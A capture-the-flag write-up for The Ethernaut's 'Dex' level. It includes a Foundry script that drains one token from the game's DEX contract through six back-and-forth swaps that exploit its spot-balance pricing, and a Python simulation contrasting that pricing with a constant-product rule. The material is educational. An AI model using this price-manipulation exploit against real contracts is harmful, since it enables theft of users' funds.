The Ethernaut - 22. dex

Gunter · November 1, 2024

The goal of this level is for you to hack the basic DEX contract below and steal the funds by price manipulation.

You will start with 10 tokens of token1 and 10 of token2. The DEX contract starts with 100 of each token.

You will be successful in this level if you manage to drain all of at least 1 of the 2 tokens from the contract, and allow the contract to report a "bad" price of the assets.

Quick note
Normally, when you make a swap with an ERC20 token, you have to approve the contract to spend your tokens for you. To keep with the syntax of the game, we've just added the approve method to the contract itself. So feel free to use contract.approve(contract.address, ) instead of calling the tokens directly, and it will automatically approve spending the two tokens by the desired amount. Feel free to ignore the SwappableToken contract otherwise.

Things that might help:

  • How is the price of the token calculated?
  • How does the swap method work?
  • How do you approve a transaction of an ERC20?
  • There's more than one way to interact with a contract!
  • Remix might help
  • What does "At Address" do?

  • The goal is to abuse the DEX's exchange rate to end up holding all of one token, or to drain both tokens!!
  • The contract computes the exchange rate with the getSwapPrice function, and that rate is determined by the current balances of the two tokens, so that looks like the thing to exploit.

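```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

import "forge-std/Script.sol";
import "../instances/Ilevel22.sol";

contract DexExploit is Script {
    // Deployed level instance
    Dex dex = Dex(0x84c765cfdbA36b9e81Db0eb7C9356eed77296ed6);

    function run() external {
        vm.startBroadcast();

        // Let the Dex move our tokens (the level's approve covers both tokens)
        dex.approve(address(dex), 1000);

        address token1 = dex.token1();
        address token2 = dex.token2();

        // Each swap sends our whole balance of the "from" token; the last one is
        // capped at what the Dex can pay. Comments: tokens received -> Dex
        // reserves (token1/token2) after the swap.
        dex.swap(token1, token2, 10); // 10  -> 110/90
        dex.swap(token2, token1, 20); // 24  -> 86/110
        dex.swap(token1, token2, 24); // 30  -> 110/80
        dex.swap(token2, token1, 30); // 41  -> 69/110
        dex.swap(token1, token2, 41); // 65  -> 110/45
        dex.swap(token2, token1, 45); // 110 -> 0/90

        vm.stopBroadcast();
    }
}
```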
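To see why pricing from the pool's current balances fails, the following added example (not part of the original post or the level's code) replays the swaps in plain integers and compares them with a constant-product rule. It assumes the formula from the published Dex level, `amount * balance(to) / balance(from)`; the names `linear_out`, `constant_product_out` and `simulate` are hypothetical, and the constant-product comparison goes beyond what the post covers.

```python
# Added example: integer model of the level's pricing, no chain access needed.

def linear_out(amount, r_from, r_to):
    # Assumed from the public Ethernaut Dex source: getSwapPrice returns
    # amount * balance(to) / balance(from), with Solidity's floor division.
    return amount * r_to // r_from

def constant_product_out(amount, r_from, r_to):
    # Hardened rule (x * y = k, fee omitted): the input is added to the
    # denominator, so the output is always strictly less than r_to.
    return amount * r_to // (r_from + amount)

def simulate(price_fn, rounds=20):
    """Swap the player's whole balance back and forth between the two tokens.

    Returns (pool, player, amounts) once the pool is emptied of one token
    or after `rounds` swaps, whichever comes first.
    """
    pool = {"token1": 100, "token2": 100}   # starting reserves stated by the level
    player = {"token1": 10, "token2": 10}   # starting player balances
    amounts = []
    src, dst = "token1", "token2"
    for _ in range(rounds):
        amount = player[src]
        out = price_fn(amount, pool[src], pool[dst])
        if out > pool[dst]:
            # The pool cannot pay out more than it holds (the real transfer
            # would revert), so use the input that yields exactly pool[dst].
            amount = pool[src]
            out = price_fn(amount, pool[src], pool[dst])
        player[src] -= amount
        pool[src] += amount
        player[dst] += out
        pool[dst] -= out
        amounts.append(amount)
        if pool[dst] == 0:
            break
        src, dst = dst, src
    return pool, player, amounts

if __name__ == "__main__":
    for name, fn in [("balance ratio", linear_out),
                     ("constant product", constant_product_out)]:
        pool, player, amounts = simulate(fn)
        print(f"{name:16} inputs={amounts} pool={pool} player={player}")
```

With the balance-ratio rule, every round trip is quoted at a price the previous swap just moved, so the player's holdings grow until one reserve hits zero. With the constant-product rule, the same back-and-forth leaves the player with fewer tokens than they started with and the reserves never empty.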
